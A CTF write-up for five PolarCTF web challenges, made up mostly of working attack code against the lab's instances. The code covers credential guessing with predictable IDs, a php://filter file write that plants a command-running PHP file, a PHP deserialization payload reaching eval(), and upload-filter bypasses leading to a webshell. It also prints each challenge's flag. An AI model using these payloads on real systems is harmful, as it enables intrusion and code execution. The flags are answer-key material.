PolarCTF WriteUp
PolarCTF WriteUp
Web
login
import re
import requests
# Walk the sequential IDs 20200102..20200129, submitting each ID as both the
# username and the password, and join the alphanumeric fragment found at the
# end of every response body.
# Defensive takeaway: this only works when accounts keep a password equal to a
# predictable ID; unique initial passwords and throttling of repeated login
# attempts are the corresponding controls.
url = "http://5077cb7c-84a4-4a16-84e9-8a4547f7efbc.www.polarctf.com:8090"
fragments = []
for i in range(2, 30):
    credential = f"202001{i:02d}"
    form = {
        "username": credential,
        "password": credential,
        "submit": "Submit+Query",
    }
    resp = requests.post(url, data=form)
    # Only the last 10 characters of the response body are inspected.
    tail_tokens = re.findall(r"[a-zA-Z0-9]+", resp.text[-10:])
    if tail_tokens:
        fragments.append(tail_tokens[0])
res = "".join(fragments)
print(res)  # flag{dlcg}
写shell
import requests
# Two requests: the POST names a php://filter write stream as `filename`, so
# the base64 text sent in `content` is decoded before it lands in a.php; the
# GET then fetches a.php and its response body is printed.
# NOTE(review): the server-side code is not shown; presumably it hands
# `filename` directly to a file-write call. Accepting only a plain basename
# (no stream wrappers) and writing into a directory that is never executed
# as PHP are the corresponding controls.
url = "http://d0b5be67-6278-429b-975b-8aa58e43c995.www.polarctf.com:8090"
write_target = "php://filter/write=convert.base64-decode/resource=a.php"
encoded_body = "aPD9waHAgc3lzdGVtKCdjYXQgL2ZsYWcnKTsgPz4="
requests.post(
    url,
    params={"filename": write_target},
    data={"content": encoded_body},
)
resp = requests.get(f"{url}/a.php")
res = resp.text
print(res)  # �^�+Zflag{30c42ede8bc4b32e2ae125afaeebee6f}
php very nice
反序列化得到的对象在被销毁时(例如脚本结束)会自动执行 __destruct() 函数;这里 __destruct() 把 $sys 属性交给 eval(),所以该属性的内容会被当作 PHP 代码执行。
<?php
// Prints the serialized form of an Example object whose $sys property has
// been replaced with a chosen PHP statement.
highlight_file(__FILE__);

/**
 * Presumably mirrors the class defined by the challenge (its source is not
 * shown here): whatever string $sys holds is passed to eval() when the
 * object is destroyed.
 *
 * Why this matters: if request data reaches unserialize(), the sender decides
 * the value of $sys. Decoding untrusted input with json_decode(), or calling
 * unserialize() with the allowed_classes option restricted, and never
 * eval()-ing a property, removes the problem.
 */
class Example
{
    public $sys = 'Can you find the leak?';

    function __destruct()
    {
        // Also fires for $crafted below when this script itself finishes.
        eval($this->sys);
    }
}

$crafted = new Example();
$crafted->sys = 'system("cat flag.php");';
echo serialize($crafted); # O:7:"Example":1:{s:3:"sys";s:23:"system("cat flag.php");";}
?>
import re
import requests
# Send the percent-encoded serialized Example string as query parameter `a`
# and print every flag{...} match found in the response body.
# NOTE(review): presumably the challenge passes `a` to unserialize(); that
# server-side code is not shown on this page.
res = ""
url = "http://66237941-9198-4958-b406-f0d7ff7a947f.www.polarctf.com:8090"
resp = requests.get(
    url,
    params={
        "a": "O:7:%22Example%22:1:{s:3:%22sys%22;s:23:%22system(%22cat%20flag.php%22);%22;}",
    },
)
# The greedy pattern runs from the first "flag{" to the last "}" on a line.
res = re.findall(r"flag{.*}", resp.text)
if res:
    print(res)  # flag{202cb962ac59075b964b07152d234b70}
upload
双写 php 后缀,修改 Content-Type: image/jpeg 绕过。
右键打开开发者工具,查看上传的文件路径:
<div id="img">
<img src="upload/32284shell.php" width="250px">
</div>
蚁剑连接地址: http://725f1d90-bcf2-42ff-bb4d-f2fce9495d2c.www.polarctf.com:8090/upload/32284shell.php
(apache:/var/www/upload) $ cat /var/www/flag.php
<?php
$flag = 'flag{a89f40341f4271659154829a2215f428}';
?>
ezupload
修改 Content-Type: image/gif 绕过。
(apache:/var/www) $ cat /var/www/flag.php
<?php
$flag = "flag{ffffffffllllaaggg_!!!}";
